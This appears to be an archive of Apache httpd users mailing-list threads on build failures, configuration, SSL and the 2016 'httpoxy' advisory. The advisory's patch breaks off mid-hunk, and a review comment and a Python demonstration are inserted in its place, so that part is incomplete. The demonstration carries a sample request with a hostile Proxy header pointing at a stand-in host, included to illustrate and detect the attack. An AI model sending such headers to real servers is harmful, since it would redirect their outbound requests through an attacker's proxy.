> -I/opt/eai/ci/httpd-2.4.25/modules/test -I/opt/eai/ci/httpd-2.4.25/server
> -I/opt/eai/ci/httpd-2.4.25/modules/arch/unix 
> -I/opt/eai/ci/httpd-2.4.25/modules/dav/main
> -I/opt/eai/ci/httpd-2.4.25/modules/generators 
> -I/opt/eai/ci/httpd-2.4.25/modules/mappers
> -c /opt/eai/ci/httpd-2.4.25/server/buildmark.c
>
> /opt/eai/ci/httpd-2.4.25/srclib/apr/build-1/libtool --silent
> --mode=link gcc -std=gnu99  -O2 -pg -pthread  -Wl,-brtl   -o httpd
> modules.lo buildmark.o -export-dynamic -Wl,-uXML_Parse
> -Wl,-bE:/opt/eai/ci/httpd-2.4.25/server/httpd.exp server/libmain.la
> modules/core/libmod_so.la modules/http/libmod_http.la  server/mpm/worker/
> libworker.la  os/unix/libos.la -L/opt/eai/ci/httpd-2.4.25/srclib/pcre/lib
> -lpcre/opt/eai/ci/httpd-2.4.25/srclib/apr-util/lib/libaprutil-1.la
> -lexpat -liconv /opt/eai/ci/httpd-2.4.25/srclib/apr/lib/libapr-1.la
> -lpthread
>
> ld: 0711-317 ERROR: Undefined symbol: apr_os_uuid_get
>
> ld: 0711-345 Use the -bloadmap or -bnoquiet option to obtain more
> information.
>
> collect2: ld returned 8 exit status
>
> make: 1254-004 The error code from the last command is 1.
>
> Any idea how to link to the right libraries?
>
> Thank you in advance.
>
> -Original Message-
> From: Jose R R [mailto:jose@metztli.com]
> Sent: Wednesday, May 24, 2017 7:24 PM
> To: users@httpd.apache.org
> Subject: Re: [users@httpd] Building httpd2.4.25 on powerpc-ibm-aix7.1.0.0
>
> Niltze [Hello]
>
> On Wed, May 24, 2017 at 8:08 AM, Joseph, Anselm 
> wrote:
>
> > I have been trying to install/compile Apache Subversion 1.9.5 with
> HTTPD-2.2.32, and it’s been 

Re: [users@httpd] What is preferred PHP interface?

2017-04-06 Thread William A Rowe Jr
There is little activity on mod_fcgid because it works. There has been talk
of tagging 2.3.10 at some point for very minor fixes.

Mod_proxy_fcgi is a viable alternative, and offers the ability to load
balance, but managing the process pool of available fcgi workers is
offloaded from httpd and becomes a distinct ops responsibility. It too has
changed little since 2013.


Re: [users@httpd] Error nghttp2 version is too old

2017-03-14 Thread William A Rowe Jr
You really need to approach your package maintainer, I picked up
nghttp2 around that same point a year ago and never had an issue.

Anything to do with rpm installs is on the maintainer, and has nothing
to do with this project, sorry we can't be of more help.

On Sun, Mar 12, 2017 at 3:12 PM, John Iliffe  wrote:
> I am trying to compile Apache 2.4.25 on Fedora 25 Linux.
>
> The current version of nghttp2 is installed:
>
> -
> [John@prod04 httpd-2.4.25]$ rpm -qv nghttp2
> nghttp2-1.13.0-2.fc25.x86_64
> -
>
> -
> /usr/lib64/libnghttp2.so.14
> /usr/lib64/libnghttp2.so.14.9.0
> -
>
> To me, these would both seem to be greater than 1.2.1, but I am getting
> this error from configure:
>
> --
> checking for nghttp2... checking for user-provided nghttp2 base
> directory... none
> checking for pkg-config along ... checking for nghttp2 version >= 1.2.1...
> FAILED
> configure: WARNING: nghttp2 version is too old
> no
> checking whether to enable mod_http2... configure: error: mod_http2 has been
> requested but can not be built due to prerequisite failures
> 
>
> These are the currently available versions from the Fedora repository.
>
> Has anyone any suggestions as to why this might be occurring?
>
> Thanks in advance.
>
> John
> ===
>




Re: [users@httpd] URG:DocumentRoot relate query on WIndows

2017-03-10 Thread William A Rowe Jr
What you are seeing is correct behavior; DocumentRoot is an absolute
path, whether you have specified this or not. If httpd sees an incomplete
path, it is going to work out an absolute path from the ServerRoot. If it
appends the default and cannot establish a full path, you will receive
the indicated error.

It seems your ServerRoot/config is equally problematic, if httpd.conf
exists in the root of a system volume. There should be nothing that
is significant about the volume C:, but there may be something very
significant about the permissions of that volume, etc.

On Fri, Mar 10, 2017 at 7:25 AM, Ishan Thakur
 wrote:
> Hi All,
>
> We are using http-2.2.31 for our application on Windows.
> We are running our application as Local Service on Windows.
> The problem description is as follows:
> “We are setting the documentRoot as “web”(no complete absolute path). This
> works fine for all the paths.
> The paths can be direct drive(D:\). But it fails only for C drive(C:\). The
> same works fine for all other paths(D:\, C:\Program Files…etc)
>
> For C drive, we are getting following error:
>
> Syntax error on line 129 of C:/httpd.conf:
> DocumentRoot must be a directory
> “
> Is there any restriction for C drive on Windows for Apache httpd-2.2.31?
>
> Regards,
> Ishan




Re: [users@httpd] Apache upgrade on Aix

2017-02-07 Thread William A Rowe Jr
There is a wealth of information in the build/ and build-1/ (APR)
subdirectories about the compiler and linker choices that were used to
create a build, if they are preserved.


On Tue, Feb 7, 2017 at 8:38 AM, Chunduru, Krishnachaithanya
 wrote:
> Hi Eric,
>
> Thanks for your reply.
>
> Actually the setup was done long back with a community version by a colleague 
> who left the organization.
>
> would it be possible to know how it was installed ?
>
> Regards,
> Krishna
>
> -Original Message-
> From: Eric Covener [mailto:cove...@gmail.com]
> Sent: Tuesday, February 07, 2017 7:06 PM
> To: users@httpd.apache.org
> Subject: Re: [users@httpd] Apache upgrade on Aix
>
> On Tue, Feb 7, 2017 at 8:09 AM, Chunduru, Krishnachaithanya 
>  wrote:
>> Can someone guide me on how to upgrade the Apache httpd from 2.4.10 to
>> 2.4.16 or later version. I couldn’t find the proper documentation for
>> doing this. Thanks.
>
>
> It depends where your old build came from. If you compiled it yourself, 
> compile it again. If you downloaded a package in lpp or rpm form, hunt for a 
> new one.
>
> --
> Eric Covener
> cove...@gmail.com
>




Re: [users@httpd] HTTPOxy vulnerability not posted to announce list?

2017-01-04 Thread William A Rowe Jr
https://lists.apache.org/list.html?annou...@httpd.apache.org:lte=1y:Httpoxy

was the first release addressing the question by httpd project.

Announce@ lists are used to broadcast release availability, making them
less than ideal channels for this foundation-wide response:

https://www.apache.org/security/asf-httpoxy-response.txt

There are a number of lists, such as bugtraq, which chronicle vulnerability
disclosures.

Cheers,

Bill

On Dec 21, 2016 1:20 PM, "Jim Allison" 
wrote:

> Hi,
>
> We recently had a site fail a PCI DSS scan due to the HTTPOxy
> vulnerability and we only received notice of Apache 2.4.25 yesterday. We
> are using 2.2 and a patch has not yet been released for that version.
>
> Going through the history of the announce list, it seems that the advisory
> for HTTPOxy was not posted there. I can see that it was posted to the users
> list back in the summer, but we were only subscribed to the announce list.
> I can see that other vulnerabilities were posted to the announce list last
> year; just not HTTPOxy.
>
> Was this just an oversight, or should we have been subscribed to the users
> list as well to get all the advisories?
>
> Thanks,
>
> Jim Allison | Technical Product Lead | 1-888-400-9185 ext 2214
> SpeedLine Solutions Inc.
> the leader in innovative solutions for pizza and delivery point of sale
>
> www.speedlinesolutions.com
>


Re: [users@httpd] Install and Configure Apache on Windows Server

2016-11-16 Thread William A Rowe Jr
There is a very recent skeleton on the wiki...
https://wiki.apache.org/httpd/WindowsTrunkCompilation

Aside from obtaining a release tarball, it is more straightforward than
using the msvc studio build schema.

On Nov 3, 2016 15:42, "Robert Ramoutar"  wrote:

>
> Hello all,
>
>
> I have been tasked with Installing and Configuring Apache 2.4 on a windows
> server for the following purpose:
>
>
> 1. Configure SSL through apache
>
>
> 2. Apache Tomcat also installed on server to handle web request to a
> specific web application - MySQL db also on the same server.
>
>
> How does one go about installing and configuring SSL through apache 2.4 on
> Windows Server 2012?
>
>
> I have read so many documents and so many questions on forums etc and is
> now more confused than before.
>
> Can someone please outline the steps require and if possible how to
> perform these steps for apache in Windows.
>
>
> Thanks.
>
> Regards,
>
> Robert Ramoutar.
>

[users@httpd] [Advisory] Apache Software Foundation Projects and "httpoxy" CERT VU#797896

2016-07-18 Thread William A Rowe Jr
Advisory: Apache Software Foundation Projects and "httpoxy" CERT VU#797896

Canonical URL: https://www.apache.org/security/asf-httpoxy-response.txt

Publication: v1.0  18 July 2016


Audience


This Advisory is directed to HTTP web server administrators and users of
the software indicated below, including CGI developers.

This Advisory is not directed to a general audience, especially web browser
users. The issues raised by the "httpoxy" class of vulnerabilities affect
web servers, and are not an issue for consumers of web services to address.


Background
--

The ASF (Apache Software Foundation) offers a number of software packages
which offer HTTP protocol ("Web") requests and responses, and offer the
developer or administrator CGI (Common Gateway Interface) routing through
these software packages.

The Apache HTTP Server (httpd and mod_fcgid), Apache Perl (mod_perl) and
Apache Tomcat projects all offer CGI handling of HTTP requests.

The Apache Traffic Server proxies HTTP requests, but offers no CGI support.

Many other ASF projects utilize the HTTP protocol, but at this time we have
not identified any which provide CGI handling, or forward the HTTP "Proxy:"
header implicated in the "httpoxy" class of issues. In the event that other
projects discover such a defect, or can contribute to mitigating this class
of issues, this Advisory will be updated.

Note especially that PHP (http://www.php.net) is not an Apache Software
Foundation project (this is a common point of confusion), and that this
Advisory does not attempt to address third-party software, scripts,
libraries or components affected by the "httpoxy" group of issues.

See https://httpoxy.org/ (not affiliated with the ASF) for a complete
discussion of the "httpoxy" class of issues, which are not reiterated
in this advisory.

The Apache Software Foundation wishes to thank Dominic Scheirlinck
and Scott Geary of Vend for bringing this issue to the attention of
the ASF Security Team for a well-coordinated community response.


Apache HTTP Server (httpd)
--

Apache HTTP Server may be configured to proxy HTTP requests as a forward
or reverse (gateway) proxy server, can proxy requests to a FastCGI service
using mod_proxy_fcgi, can directly serve CGI applications using mod_cgi
or mod_cgid or the related mod_isapi service. The project's mod_fcgid
subproject (available as a separate add-in module) directly manages CGI
scripts using the FastCGI protocol.

It may also be configured to directly host a number of external modules
which run CGI-style applications in-process. The server itself does not
modify the CGI environment in this case, however, these external modules
may perform such modifications of their environment variables in-process.
Such examples include mod_php, mod_perl and mod_wsgi.

To mitigate "httpoxy" issues across all of the above mechanisms, the most
direct solution is to drop any "Proxy:" header arriving from an upstream
proxy server or the origin user-agent. This will mitigate the issue for any
vulnerable back-end server or CGI across all traffic through this server.

The two lines below enabled in the httpd.conf file will remove the "Proxy:"
header from all incoming requests, before further processing;

LoadModule headers_module {path-to}/mod_headers.so

RequestHeader unset Proxy early

(Users who have mod_headers compiled-in to the httpd binary must omit
the LoadModule directive above, others must adjust the {path-to} to point
to the mod_headers.so file.)

If the administrator wishes to preserve the value of the "Proxy:" header
for most traffic, and only eliminate it from the CGI environment variable
HTTP_PROXY, a second mitigation is offered. This patch will address this
behavior in mod_cgi, mod_cgid, mod_isapi, mod_proxy_fcgi and mod_fcgid,
along with all other consumers of httpd's built-in environment handling.

The bundled httpd modules all rely on ap_add_common_vars() to set up the
target CGI environment. The project will include the recommended patch
below in all subsequent releases of httpd, including 2.4.24 and 2.2.32.
Users who build httpd 2.2.x or 2.4.x from source may apply the patch below,
recompile and re-install httpd to obtain this mitigation. This mitigation
has been assigned the identifier CVE-2016-5387.

=== Patch to httpd sources 2.4.x and 2.2.x ===
--- server/util_script.c(revision 1752426)
+++ server/util_script.c(working copy)
@@ -186,6 +186,14 @@ AP_DECLARE(void) ap_add_common_vars(request_rec *r
 else if (!strcasecmp(hdrs[i].key, "Content-length")) {
 apr_table_addn(e, "CONTENT_LENGTH", hdrs[i].val);
 }
+/* HTTP_PROXY collides with a popular envvar used to configure
+ * proxies, don't let clients set/override it.  But, if you must...
+ */
+#ifndef SECURITY_HOLE_PASS_PROXY
+else if (!strcasecmp(hdrs[i].key, "Proxy")) {
+;
+}
+#endif
 
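Review bot: the new `else if (!strcasecmp(hdrs[i].key, "Proxy")) { ; }` branch silently discards the header, which is the right outcome for the CGI environment but leaves operators with no signal that a client sent one; a debug-level log line in that branch would make such attempts visible in the error log without changing behaviour. Two things are also worth stating in the accompanying documentation: building with `SECURITY_HOLE_PASS_PROXY` defined removes the `#ifndef` guard and so reintroduces CVE-2016-5387, and because the check lives only in ap_add_common_vars(), in-process modules that assemble their own environment (the advisory names mod_php, mod_perl and mod_wsgi) are not covered by this hunk and still depend on the `RequestHeader unset Proxy early` mitigation.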

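As an added illustration of what the patch and the RequestHeader mitigation above protect against (example code written for this page, not httpd's source or the advisory's own text), the following Python models the header-to-environment mapping that a CGI gateway such as ap_add_common_vars() performs, drops the "Proxy" header the way the hunk does, and keeps a flag that mimics the SECURITY_HOLE_PASS_PROXY build option so the vulnerable and mitigated environments can be compared side by side. The sample header list, the function names and the helper that reports Proxy headers for logging are all constructed for this example.

```python
# Headers that CGI (RFC 3875) maps to dedicated meta-variables instead of
# the generic HTTP_ prefix; mirrors the Content-type / Content-length
# special cases visible in the util_script.c hunk quoted in the advisory.
SPECIAL_HEADERS = {
    "content-type": "CONTENT_TYPE",
    "content-length": "CONTENT_LENGTH",
}

# Request headers that must never reach the CGI environment.  "Proxy" would
# become HTTP_PROXY, a variable many HTTP client libraries honour as their
# outbound proxy setting (the httpoxy issue; CVE-2016-5387 for httpd's
# ap_add_common_vars()).
DROPPED_HEADERS = {"proxy"}


def cgi_env_name(header, pass_proxy=False):
    """Return the CGI meta-variable name for a request header.

    Returns None when the header is deliberately dropped.  pass_proxy=True
    models a build with SECURITY_HOLE_PASS_PROXY defined, i.e. the
    vulnerable behaviour, and exists only so both cases can be compared.
    """
    lname = header.lower()
    if lname in DROPPED_HEADERS and not pass_proxy:
        return None
    if lname in SPECIAL_HEADERS:
        return SPECIAL_HEADERS[lname]
    # Generic CGI rule: upper-case the name, turn '-' into '_', prefix HTTP_.
    return "HTTP_" + header.upper().replace("-", "_")


def build_cgi_env(headers, pass_proxy=False):
    """Build the header-derived part of a CGI environment.

    headers is a list of (name, value) pairs in wire order.  Repeated
    headers are joined with ", " as a gateway must when it has to fit them
    into a single environment variable.
    """
    env = {}
    for name, value in headers:
        key = cgi_env_name(name, pass_proxy)
        if key is None:
            continue
        env[key] = value if key not in env else env[key] + ", " + value
    return env


def proxy_header_values(headers):
    """Detection helper (constructed for this example): return the values
    of any 'Proxy' request header.  A request has no legitimate reason to
    carry this header, so a non-empty result is worth logging at the edge
    even once the mitigation is in place.
    """
    return [value for name, value in headers if name.lower() == "proxy"]


# Constructed sample request, not a captured one.  The Proxy value uses a
# TEST-NET-3 address so it cannot point anywhere real.
SAMPLE_HEADERS = [
    ("Host", "www.example.test"),
    ("User-Agent", "curl/7.47.0"),
    ("Content-Type", "application/x-www-form-urlencoded"),
    ("Content-Length", "13"),
    ("Proxy", "http://203.0.113.5:8080"),
    ("X-Forwarded-For", "192.0.2.10"),
    ("X-Forwarded-For", "198.51.100.7"),
]


if __name__ == "__main__":
    hardened = build_cgi_env(SAMPLE_HEADERS)
    vulnerable = build_cgi_env(SAMPLE_HEADERS, pass_proxy=True)
    print("HTTP_PROXY in hardened env  :", "HTTP_PROXY" in hardened)
    print("HTTP_PROXY in vulnerable env:", vulnerable.get("HTTP_PROXY"))
    print("Proxy header values seen    :", proxy_header_values(SAMPLE_HEADERS))
```

Running the block shows the same request producing an environment with and without HTTP_PROXY depending on a single build-time choice, which is why the advisory recommends stripping the header at the edge with mod_headers as well: that covers modules that build their own environment and do not pass through the patched function.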
Re: [users@httpd] rpmbuild for httpd-2.4.23 failed missing mod_proxy_fdpass.so

2016-07-17 Thread William A Rowe Jr
This is a dev@ level regression, sharing with that list. Please confirm you
are using httpd's own rpm. If not, the specific --enable-modules provided
for your rpm.spec file may be at issue.

On Jul 17, 2016 3:45 AM, "kohmoto"  wrote:

> I tried to rpmbuild the former version httpd-2.4.20.tar.bz2 in the same
> machine. The result was successful without error. So, the rpmbuild failure
> of httpd-2.4.23 missing mod_proxy_fdpass.so is not due to my rebuild
> environment. All previous versions gave also successful results.
>
> Messages output during rpmbuild of httpd-2.4.20 are little different from
> httpd-2.4.23.
>
> [httpd-2.4.20]
> checking whether to enable mod_proxy_fdpass... checking dependencies
> checking whether CMSG_DATA is declared... yes
> checking whether to enable mod_proxy_fdpass... shared (all)
>
> [httpd-2.4.23]
> checking whether to enable mod_proxy_fdpass... no
>
> [httpd-2.4.20]
> Building shared: mod_proxy.la mod_proxy_connect.la mod_proxy_ftp.la
> mod_proxy_http.la mod_proxy_fcgi.la mod_proxy_scgi.la mod_proxy_fdpass.la
> mod_proxy_wstunnel.la mod_proxy_ajp.la mod_proxy_balancer.la
> mod_proxy_express.la
>
> [httpd-2.4.23] mod_proxy_fdpass.la is missing
> Building shared: mod_proxy.la mod_proxy_connect.la mod_proxy_ftp.la
> mod_proxy_http.la mod_proxy_fcgi.la mod_proxy_scgi.la
> mod_proxy_wstunnel.la mod_proxy_ajp.la mod_proxy_balancer.la
> mod_proxy_express.la mod_proxy_hcheck.la
>
> [httpd-2.4.20]
> /usr/lib64/apr/build-1/libtool --silent --mode=compile gcc -std=gnu99
> -pthread  -O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions
> -fstack-protector-strong --param=ssp-buffer-size=4 -grecord-gcc-switches
> -m64 -mtune=generic-DLINUX -D_REENTRANT -D_GNU_SOURCE -I.
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/os/unix
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/include -I/usr/include/apr-1
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/aaa
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/cache
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/core
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/database
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/filters
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/ldap
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/server
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/loggers
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/lua
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/proxy
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/session
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/ssl
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/test
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/server
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/arch/unix
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/dav/main
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/generators
> -I/home/webadmin/rpmbuild/BUILD/httpd-2.4.20/modules/mappers -prefer-pic -c
> mod_proxy_fdpass.c && touch mod_proxy_fdpass.slo
> /usr/lib64/apr/build-1/libtool --silent --mode=link gcc -std=gnu99
> -pthread  -O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions
> -fstack-protector-strong --param=ssp-buffer-size=4 -grecord-gcc-switches
> -m64 -mtune=generic -Wl,-z,relro-o mod_proxy_fdpass.la -rpath
> /usr/lib64/httpd/modules -module -avoid-version  mod_proxy_fdpass.lo
>
> [httpd-2.4.23]
> no compile, no link
>
> [httpd-2.4.20]
> /usr/lib64/apr/build-1/libtool --silent --mode=install install
> mod_proxy_fdpass.la
> /home/webadmin/rpmbuild/BUILDROOT/httpd-2.4.20-1.x86_64/usr/lib64/httpd/modules/
>
> [httpd-2.4.23]
> no install
>
> I hope these findings would be a little help to understand the rpmbuild
> error.
>
> Yours truly,
> Kazuhiko Kohmoto
>
>


Re: [users@httpd] Apache fails to start after updating openssl from 1.0.1j to 1.0.2g

2016-03-19 Thread William A Rowe Jr
There was a well-documented binary breakage in 1.0.2g that has already
been fixed in their source repository for the next openssl upgrades.

That fix is here;
https://github.com/openssl/openssl/commit/133138569f37d149ed1d7641fe8c75a93fded445


On Mon, Mar 14, 2016 at 12:05 PM, Ron Hawkins  wrote:

> Hello, I tried updating the version of OpenSSL on my Apache web server
> from 1.0.1j to 1.0.2g and now the web server won't start (actually I
> dropped back so I'm not totally freaking out).  It appears to be failing
> before it can write to the error log.  To update I simply copied
> openssl.exe, libeay32.dll, and ssleay32.dll to the \Apache\bin folder.
>
> Here are the pertinent details on my server:
>  Windows 2008 R2
>  Apache 2.2.6 (Win32)
>  Openssl 1.0.2g binaries downloaded from
> https://indy.fulgan.com/SSL/openssl-1.0.2g-i386-win32.zip
>  I also tried
> https://indy.fulgan.com/SSL/openssl-1.0.1s-i386-win32.zip with the same
> results.
>
> I have a dev server running Apache 2.4.12 and it updated successfully.
>
> Is there a compatibility problem with Apache 2.2.6 and OpenSSL 1.0.2g?
> I'm considering upgrading Apache to find out, but I don't want to take my
> site down any more than I have to.
>
> Ron
>
>


Re: [users@httpd] SNI SSL per domain?

2016-02-02 Thread William A Rowe Jr
Sounds like you have mis-structured the config.  Per servername - each can
and should have its own cert and will be selected via SNI.  If there are
subadmins beneath each vhost section #include those snippets and they all
still fall within the given host name.
On Feb 1, 2016 11:21 AM, "Felipe Gasper"  wrote:

> On 1 Feb 2016 12:16 PM, Oscar Knorn wrote:
>
>> On 2016/02/01 Felipe Gasper wrote:
>>
>>> Hello,
>>>
>>>  Is it possible to do SNI SSL per domain rather than per vhost? If
>>> not, is there a feature request in for this?
>>>
>>>  Thank you!
>>>
>>> -Felipe Gasper
>>> Houston, TX
>>>
>>
>> Hello Felipe,
>>
>> aren't the domains in your configuration organized in vhost sections
>> yet? Do you think there might be a reason you can't organize them that
>> way?
>>
>> Cheers Oscar
>>
>
> Hi Oscar,
>
> Thanks for responding!
>
> We have end users customizing their own vhost configurations via a
> limited-access interface; hence, I can’t put one domain per vhost.
>
> -F
>


Re: [users@httpd] Blocking of users [was: Apache Server Access]

2016-01-14 Thread William A Rowe Jr
Precisely.  We are likely to be switching mailing list mgmt platforms very
soon, with luck we can preserve the subscribed address in such a way that
unsubscribing users is less of a hassle.  Right now the embedded
list-unsubscribe fails to suggest the specific email address that needs to
be unlinked.

Third party subscriptions, unintentional or harassing the individual or the
list, will happen.  Let's assume the best intentions of users stuck in a
list, please.
On Jan 11, 2016 08:00, "Tobias Adolph"  wrote:

> Hi,
>
> On 11.01.2016 at 14:07, Yehuda Katz wrote:
>
> It's unfortunate that people can't figure out how to unsubscribe from a
> mailing list that they subscribed to in the first place.
>
>
> Maybe the person yelling isn't the same who subscribed to the list...
> i...@idealgourmet.es sounds not like an address that is dedicated to one
> person only. Maybe an employee subscribed a long time ago and now the
> person currently responsible for the inbox is just unable to cope with all
> this - in his or her eyes - weird tech stuff.
>
> Therefore my proposal to manually remove/block the address. But it seems
> that this has happened.
>
> Kind regards,
> Tobias
>


Fwd: [users@httpd] Possible virus via httpd server

2016-01-13 Thread William A Rowe Jr
Is there a kind soul fluent enough Spanish to write a note to this user and
help them out of their perhaps-unsolicited subscription in their native
tongue?

Two polite attempts to reach them have failed completely, so I'm simply
going to filter this sender to /dev/null, sigh.

Speaking of Spanish, there is an offer for new translations of httpd that
we would love proof-reading help with, if you are interested.  Please join
up with d...@httpd.apache.org if you would like to help review translated
docs pages!

Cheers,

Bill


-- Forwarded message --
From: William A Rowe Jr <wr...@rowe-clan.net>
Date: Wed, Jan 6, 2016 at 4:39 PM
Subject: Re: [users@httpd] Possible virus via httpd server
To: IdealGourmet <i...@idealgourmet.es>


Dear reader,

I am a project member at Apache, and I ask you to pay close attention.  I
want you to help you *stop* receiving emails from apache.org.

I offered you help last month, you didn't follow up.

I NEED you to FORWARD me one of these emails *as an attachment*.  If I see
the attachment, it will tell me *how* you are subscribed and *where* the
email was directed.  It was not directed to you and was not emailed to
i...@idealgourmet.es because that email is not a subscriber.

Otherwise, please tell me instead what email addresses forward to your info@
email account?  I will hunt those down and remove them from the subscriber
list.

But if you don't follow these instructions I simply cannot help you :(

If it would help, I can pass this on to a speaker of Espanol for easier
communications?

Kindly yours,

Bill

On Mon, Jan 4, 2016 at 2:44 PM, IdealGourmet <i...@idealgourmet.es> wrote:

> Stop to send emails in this address You make an
> error!!!
>
> -Original Message-
> From: Michael D. Berger [mailto:m.d.ber...@ieee.org]
> Sent: Monday, 4 January 2016 21:42
> To: users@httpd.apache.org; frazier...@sbcglobal.net
> Subject: RE: [users@httpd] Possible virus via httpd server
>
> I tried the submission you suggest.  It said it is an executable file,
> suitable for my Linux box.  I don't think I am about to run it.  Note that
> my ESET NOD32 virus software finds nothing wrong with it.
>
> Thanks,
> Mike.
> --
> Michael D. Berger
> m.d.ber...@ieee.org
> http://www.rosemike.net/
>
>
> > -Original Message-
> > From: Kent Frazier [mailto:frazier...@sbcglobal.net]
> > Sent: Monday, January 04, 2016 13:57
> > To: users@httpd.apache.org
> > Subject: Re: [users@httpd] Possible virus via httpd server
> >
> >
> > You might try submitting the file at
> > https://www.virustotal.com and see what it detects.
> >
> > On 1/4/16 8:18 AM, Michael D. Berger wrote:
> > > Examining with Lemmy (A Windows version of VI), it looks
> > like a binary file.
> > > Size is 181.4 KB.
> > > I am considering my favorite virus remover: DBAN, but it would take
> > > several days work to recover from that.
> > >
> > > Mike.
> > > --
> > > Michael D. Berger
> > > m.d.ber...@ieee.org
> > > http://www.rosemike.net/
> > >
> > >
> > >> -Original Message-
> > >> From: Daniel Beardsmore [mailto:dan...@trustnetworks.co.uk]
> > >> Sent: Monday, January 04, 2016 05:03
> > >> To: users@httpd.apache.org
> > >> Subject: RE: [users@httpd] Possible virus via httpd server
> > >>
> > >> Well, what do you see if you examine the file in a text editor?
> > >>
> > >>> -Original Message-
> > >>> From: Michael D. Berger [mailto:m.d.ber...@ieee.org]
> > >>> Sent: 04 January 2016 05:03
> > >>> To: Apache-Users
> > >>> Subject: [users@httpd] Possible virus via httpd server
> > >>>
> > >>> Using my WinXP Firefox client to access my previously
> > working httpd
> > >>> 2.4 server on Fedora 23 gets a file named 1OfvyQ5L instead of my
> > >>> index.html .  Do you think I have a virus on my Linux box?  I did
> > >>> notice that my iptables is not as tight as it should be.
> > >>>
> > >>> --
> > >>> Michael D. Berger
> > >>> m.d.ber...@ieee.org
> > >>> http://www.rosemike.net/
> > >>>
> > >>>
> > >>>
> > >>>
> > >>
> > >>
> > >>
> >
> >
> >
> >
> > -
> > To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> > For additional commands, e-mail: users-h...@httpd.apache.org
> >
> >
>


Re: [users@httpd] Circumstances when mod_php would run faster than PHP-FPM?

2016-01-09 Thread William A Rowe Jr
Mod_proxy_fcgi + php-fpm or mod_fcgid with php fcgi sapi should both be
equivalent when tuned correctly.

Your only option for running php in process efficiently is to use the
non-threadsafe php in the httpd prefork module.  Your only option for
running httpd efficiently is the event, or at least the worker mpm.

Since usually only a subset of the http requests are to a php resource, the
answer is almost always 'no'.
On Jan 8, 2016 16:48, "Rose, John B"  wrote:

> Apache 2.4
>
> On the same system, same web site, are there circumstances when Apache
> using mod_php would run faster than Apache using PHP-FPM?
>
> Thanks
>


Re: [users@httpd] ProxyPass + Redirect

2015-12-16 Thread William A Rowe Jr
On Wed, Dec 16, 2015 at 4:34 PM, Christopher Schultz <
ch...@christopherschultz.net> wrote:

>
>RedirectMatch ^/foo(/)?$ /foo/someplace_specific.html
>RedirectMatch ^/foo/index.html$ /foo/someplace_specific.html
>ProxyPass /foo/index.html !
>ProxyPass /foo/ http://localhost:8009/foo/
>ProxyPassReverse /foo/ http://localhost:8009/foo/
>
> Unfortunately, this doesn't seem to be working for me: a request for
> /foo/index.html gives me a 404 error *and a JSESSIONID from Tomcat*, so
> I'm fairly certain that the request is being proxied.
>

I thought this was order-sensitive, try reversing the two ProxyPass
statements.


Re: [users@httpd] Buffer overrun in Apache 2.4.7-2.4.17

2015-12-15 Thread William A Rowe Jr
On Tue, Dec 15, 2015 at 2:34 PM, Mike Pastore  wrote:

> Hi folks,
>
> I believe I've found a buffer overrun affecting (at least) Apache 2.4.7
> and 2.4.17. I don't know enough about this sort of thing to determine how
> serious it is and whether or not it is a potential security vulnerability.
> If someone would please work with me to validate my findings and help me
> handle it responsibly, I would greatly appreciate it.
>

The only maintained version is 2.4.x branch, which corresponds to 2.4.18
right now, or 2.2.31.  Anything older that is no longer vulnerable we treat
as non-sequitur, potentially a problem but not applicable to the shipping
flavors.

We would love for you to reproduce and share at secur...@httpd.apache.org
to confirm or reject the suggested exploit, and we do appreciate responsible
disclosure.


Re: [users@httpd] Apache2 does not properly start

2015-12-10 Thread William A Rowe Jr
It's been too many years since I and others have looked at 2.4.7, if you
can try this on a modern release of httpd and share those error logs, be
glad to review.

Bill
On Dec 10, 2015 10:40 AM, "LVDave"  wrote:

> I have an Apache2 install (v2.4.7) running on Ubuntu 14.04 (32bit)
> that had been working fine up till I added SSL support and certs from
> LetsEncrypt. Previously all traffic was port 80 http.. What I get when
> trying to start Apache2 is the following
>
> root@vm4:/home/dave# service apache2 start
>  * Starting web server apache2
>
>  *
>  * The apache2 instance did not start within 20 seconds. Please read
> the log files to discover problems
>
> After this message prints on the console, I see the normal apache2
> processes in ps xua, however if I try to stop it via "service apache2
> stop", I get a warning message about unknown pids and that apache2
> will not be stopped. I do a killall apache2 to stop them.
>
> In the default "info" logging config I got nothing in
> /var/log/apache2/error.log, so I changed to debug logging, and get the
> following:
>
> [Thu Dec 10 08:14:03.452466 2015] [mpm_prefork:notice] [pid 30384]
> AH00169: caught SIGTERM, shutting down
> [Thu Dec 10 08:14:42.753394 2015] [ssl:debug] [pid 30534]
> ssl_engine_pphrase.c(181): AH02199: SSL not enabled on vhost
> vm4.bestnewage.net:80, skipping SSL setup
> [Thu Dec 10 08:14:42.753511 2015] [ssl:debug] [pid 30534]
> ssl_engine_pphrase.c(181): AH02199: SSL not enabled on vhost
> ruddfoundationnv.org:80, skipping SSL setup
> [Thu Dec 10 08:14:42.753943 2015] [ssl:debug] [pid 30534]
> ssl_engine_pphrase.c(239): AH02202: Init: Read server certificate from
> '/etc/letsencrypt/live/www.ruddfoundationnv.org/cert.pem'
> [Thu Dec 10 08:14:42.754337 2015] [ssl:info] [pid 30534] AH01887:
> Init: Initializing (virtual) servers for SSL
